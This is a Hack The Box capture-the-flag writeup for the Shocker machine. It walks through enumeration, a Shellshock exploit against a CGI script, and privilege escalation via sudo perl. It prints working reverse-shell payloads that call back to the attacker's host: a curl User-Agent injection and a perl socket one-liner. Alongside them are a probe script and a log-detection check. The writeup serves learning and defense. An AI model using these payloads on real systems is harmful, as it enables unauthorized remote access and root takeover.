Hack The Box - Shocker Writeup



Description:

This is an easy Linux box that is vulnerable to Shellshock (CVE-2014-6271). Doing this as part of my OSCP preparation.

Enumeration

Add shocker.htb to /etc/hosts and start an nmap scan.

Nmap

kali@kali:~$ sudo nmap -sS -A shocker.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-12 23:09 EDT
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.23s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)

Dirb

kali@kali:~/Desktop/tools/autorecon/results/shocker.htb/scans$ dirb http://shocker.htb

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Aug 13 09:43:37 2020
URL_BASE: http://shocker.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://shocker.htb/ ----
+ http://shocker.htb/cgi-bin/ (CODE:403|SIZE:294)

The initial scan reveals a cgi-bin directory that answers with a 403. That only means directory listing is forbidden; scripts inside it can still be requested and executed if we can guess their names.

At this point I had done literally everything possible for an initial foothold, but I could not find anything useful. After some clues from the name of the box and the forums, I came to the conclusion that the box is vulnerable to Shellshock.

Let's run dirb again against the cgi-bin directory, this time looking for .sh files, since a shell script served through CGI is the likely entry point for Shellshock: Apache's mod_cgi passes request headers to the script as environment variables, and an unpatched bash executes whatever follows a function definition placed in any of those variables.

kali@kali:~/Desktop/htb/shocker$ dirb http://shocker.htb/cgi-bin/ -X .sh

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Aug 13 11:14:02 2020
URL_BASE: http://shocker.htb/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://shocker.htb/cgi-bin/ ----
+ http://shocker.htb/cgi-bin/user.sh (CODE:200|SIZE:118)

-----------------
END_TIME: Thu Aug 13 11:32:47 2020
DOWNLOADED: 4612 - FOUND: 1

Alright, we have a hit.

Requesting the script returns its output:

Content-Type: text/plain

Just an uptime test script

 10:26:56 up 11:16,  0 users,  load average: 0.01, 0.01, 0.00


Nothing special: it is a shell script that prints the output of uptime. Let's start trying out payloads to trigger Shellshock.
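Before firing a reverse shell it is worth confirming that the script is actually vulnerable with a harmless probe. The following script is an added example and not part of the original writeup; the target URL, the marker string and the sample responses are assumptions constructed for illustration.

```sh
#!/bin/sh
# Added example, not from the original writeup: a non-destructive Shellshock
# probe for a CGI script. Apache's mod_cgi exports each request header as an
# environment variable named HTTP_<HEADER>; an unpatched bash parses a value
# beginning with "() { :; };" as a function definition and then executes the
# text that follows the closing brace. The target URL, the marker string and
# the sample responses below are assumptions made for illustration.

# Map an HTTP header name to the CGI environment variable it becomes.
cgi_env_name() {
    printf 'HTTP_%s\n' "$(printf '%s' "$1" | tr 'a-z-' 'A-Z_')"
}

# Build a probe header whose only side effect is to echo a marker into the
# response. The injected commands run before the script itself, so they emit
# a valid CGI header block (Content-Type plus a blank line) first; a bare
# marker as the first output line would be rejected by Apache as a malformed
# header and turned into a 500.
probe_header() {
    printf '%s: () { :; }; echo Content-Type: text/plain; echo; echo %s\n' "$1" "$2"
}

# Return 0 when the marker made it into the response body, 1 otherwise.
is_vulnerable() {
    case "$1" in
        *"$2"*) return 0 ;;
        *)      return 1 ;;
    esac
}

# Send the probe with curl. The header defaults to User-Agent, but Referer,
# Cookie or any custom header works just as well, since all of them become
# environment variables for the script.
probe_target() {
    url="$1"
    header="${2:-User-Agent}"
    marker="${3:-shellshock_probe_$$}"
    body=$(curl -s -H "$(probe_header "$header" "$marker")" "$url")
    is_vulnerable "$body" "$marker"
}

# Constructed sample responses standing in for a live target. The vulnerable
# one carries the marker ahead of the script's own header and body; the
# patched one is the script's normal output, because a fixed bash ignores the
# trailing command and only imports the (empty) function.
SAMPLE_VULN=$(printf 'shellshock_probe_1\nContent-Type: text/plain\n\nJust an uptime test script\n')
SAMPLE_PATCHED=$(printf 'Just an uptime test script\n\n 10:26:56 up 11:16,  0 users,  load average: 0.01, 0.01, 0.00\n')
```

Source the file and run `probe_target http://shocker.htb/cgi-bin/user.sh && echo vulnerable` to test the User-Agent header; pass a second argument such as `Referer` to try another header. Because the probe only echoes a marker, it leaves no process running on the target and is safe to repeat across every script dirb finds.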

User Shell

Start a listener on port 1337 first (below), then send the following request. The User-Agent value reaches the script as the HTTP_USER_AGENT environment variable; the vulnerable bash parses `() { :; };` as a function definition and then runs the command that follows it, which connects a shell back to 10.10.14.4.

curl -H "User-Agent: () { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/1337 0>&1'" shocker.htb/cgi-bin/user.sh

The listener, started beforehand, receives the shell.

kali@kali:~/Desktop/tools/autorecon/results/shocker.htb/scans$ nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.4] from shocker.htb [10.10.10.56] 52198
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
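The request above is also what a defender would look for. As an added example, not part of the original writeup, here is a small check over Apache combined-format access log lines, where the Referer and User-Agent are the two quoted fields at the end of each line; the log lines are constructed for this example, and the second one mirrors the curl request used above.

```sh
#!/bin/sh
# Added example, not part of the original writeup: finding Shellshock attempts
# in an Apache combined-format access log. The lines below are constructed for
# this example; the second mirrors the reverse-shell request used in the writeup.
LOG=$(cat <<'EOF'
10.10.14.4 - - [13/Aug/2020:11:40:02 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.68.0"
10.10.14.4 - - [13/Aug/2020:11:41:15 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/1337 0>&1'"
10.10.14.4 - - [13/Aug/2020:11:42:30 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() { :;}; echo; echo probe" "Mozilla/5.0"
10.10.14.4 - - [13/Aug/2020:11:43:01 -0400] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64)"
EOF
)

# Lines in which a quoted header value starts with a bash function definition.
# Every spelling of the payload shares the "() {" opener, so that is the key;
# the optional space covers "(){" as well.
shellshock_hits() {
    printf '%s\n' "$1" | grep -E '"\(\) ?\{'
}

# Number of hits; prints 0 rather than failing when there are none.
count_shellshock() {
    shellshock_hits "$1" | grep -c . || true
}

# Source address and requested path per hit: the same client probing and then
# exploiting the same CGI script is the pattern to pivot on.
shellshock_sources() {
    shellshock_hits "$1" | awk '{ print $1, $7 }'
}
```

This only catches payloads delivered in the two headers the combined format records; a payload in Cookie or in a custom header would be invisible here, so inspect requests at the web server rather than relying on access logs alone. On the host itself the giveaway is the CGI script's bash spawning a child shell that opens a /dev/tcp connection, exactly what the session above shows.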

Root Shell

sudo -l shows that shelly may run /usr/bin/perl as root without a password.

shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

Since perl can execute arbitrary commands, anything it runs under sudo runs as root. Here we use it to spawn a second reverse shell, though simply exec'ing a shell from perl in the session we already have would work as well.

shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.4";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Start a listener to receive the shell.

kali@kali:~/Desktop/tools$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from shocker.htb [10.10.10.56] 40916
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

And we are root!
